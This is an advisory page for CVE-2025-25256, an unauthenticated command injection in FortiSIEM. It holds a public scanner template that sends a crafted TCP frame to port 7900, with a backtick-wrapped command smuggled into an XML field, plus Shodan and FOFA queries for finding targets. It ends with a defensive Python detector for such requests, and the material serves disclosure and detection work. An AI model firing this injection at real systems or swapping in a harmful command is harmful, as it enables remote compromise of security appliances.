CVE-2025-25256: Fortinet FortiSIEM - OS Command Injection

Date: 2025-08-01 | Affected software: Fortinet FortiSIEM | PoC: public

Vulnerability description

Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely.

PoC code [public]

id: CVE-2025-25256

info:
  name: Fortinet FortiSIEM - OS Command Injection
  severity: critical
  author: watchtowr,darses
  description: |
    Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely.
  impact: |
    Unauthenticated attackers can execute arbitrary commands, potentially leading to full system compromise.
  remediation: |
    Update to the latest version beyond 7.3.1.
  classification:
    cve-id: CVE-2025-25256
    cwe-id: CWE-78
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
    epss-percentile: 0.96596
    epss-score: 0.30941
    cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
  metadata:
    vendor: fortinet
    product: fortisiem
    shodan-query:
      - http.favicon.hash:-1341442175
      - http.html:"var hst = location.hostname"
    fofa-query:
      - icon_hash="-1341442175"
      - body="var hst = location.hostname"
  reference:
    - https://www.fortiguard.com/psirt/FG-IR-25-152
    - https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
    - https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/
  tags: cve,cve2025,rce,network,tcp,fortinet,vkev

variables:
  xml: |
    <root>
      <archive_storage_type>nfs</archive_storage_type>
      <archive_nfs_server_ip>127.0.0.1</archive_nfs_server_ip>
      <archive_nfs_archive_dir>`echo${IFS}/`</archive_nfs_archive_dir>
      <scope>local</scope>
    </root>
  payload: "\x5a\x00\x00\x00{{hex_decode(dec_to_hex(len(xml)))}}\x00\x00\x00\x6f\x42\x1e\x40\x00\x00\x00\x00{{xml}}"

tcp:
  - inputs:
      - data: "{{payload}}"

    host:
      - "tls://{{Hostname}}"
    port: 7900
    read-size: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "\x01\x00\x00\x00"
# digest: 4a0a004730450220163d3c9ac9fe3eabbcca933d8a8b98b2ed6ec1270f0c7c1547d8c468ce3bc9da022100bcf0eca67bcee65916fe48405e7e88a2516999fbf3662b09b02ef37ce2ed191e:922c64590222798bb761d5b6d8e72950
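As an added example (not part of the original page or of the watchTowr PoC), a passive check a defender could run over captured port-7900 requests from a network sensor or honeypot: it parses the frame layout the template above uses and flags XML fields that carry shell metacharacters, which is the pattern this injection relies on. The frame layout and the little-endian length field are assumptions read off the template's payload variable, not vendor documentation, and the sample frames are constructed here.

```python
import re
import struct
import xml.etree.ElementTree as ET

# Opcode and fixed header bytes as they appear in the template's payload
# variable. The length the template inserts between them is read here as a
# little-endian uint32, which matches the single-byte value the template
# emits for XML bodies shorter than 256 bytes (assumption, not vendor docs).
OPCODE = b"\x5a\x00\x00\x00"
FIXED = b"\x6f\x42\x1e\x40\x00\x00\x00\x00"

# Characters that have no business in an NFS server or directory field.
SHELL_META = re.compile(r"[`$;|&<>(){}\n]")

def parse_frame(data: bytes):
    """Return the XML body of one port-7900 request, or None if the frame is
    not well formed (wrong opcode, truncated header, length field that
    disagrees with the bytes actually present)."""
    if len(data) < 16 or data[:4] != OPCODE or data[8:16] != FIXED:
        return None
    declared = struct.unpack("<I", data[4:8])[0]
    body = data[16:]
    return body if declared == len(body) else None

def suspicious_fields(xml_body: bytes):
    """Return (tag, text) pairs whose text carries shell metacharacters."""
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        # A body that is not even XML is itself worth an alert.
        return [("<unparseable>", xml_body.decode("latin-1", "replace"))]
    return [(el.tag, el.text) for el in root.iter()
            if el.text and SHELL_META.search(el.text)]

def classify(data: bytes) -> str:
    """'malformed', 'injection' or 'clean' for one captured request."""
    body = parse_frame(data)
    if body is None:
        return "malformed"
    return "injection" if suspicious_fields(body) else "clean"

def _frame(xml: bytes) -> bytes:
    # Constructed fixtures for the checks below, not captured traffic.
    return OPCODE + struct.pack("<I", len(xml)) + FIXED + xml

CLEAN = _frame(b"<root><archive_storage_type>nfs</archive_storage_type>"
               b"<archive_nfs_archive_dir>/export/siem</archive_nfs_archive_dir></root>")
INJECTED = _frame(b"<root><archive_storage_type>nfs</archive_storage_type>"
                  b"<archive_nfs_archive_dir>`echo${IFS}/`</archive_nfs_archive_dir></root>")
```

A truncated or length-inconsistent frame is reported as malformed rather than silently parsed, so a sensor does not miss fragmented or deliberately padded requests.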
